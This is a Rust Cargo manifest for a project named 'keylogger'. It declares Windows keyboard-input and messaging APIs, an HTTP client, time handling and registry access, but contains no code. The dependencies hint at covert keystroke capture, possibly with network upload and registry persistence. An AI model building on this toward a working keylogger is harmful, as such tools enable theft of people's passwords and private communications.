[package]
name = "keylogger"
version = "0.1.0"
edition = "2021"

[dependencies]
windows = { version = "0.54.0", features = [
    "Win32_UI_Input_KeyboardAndMouse",
    "Win32_UI_WindowsAndMessaging",
    "Win32_System_Console",            
    "Win32_Foundation"
] }
reqwest = { version = "0.11", features = ["blocking", "json"] }
chrono = "0.4"
winreg = "0.11"

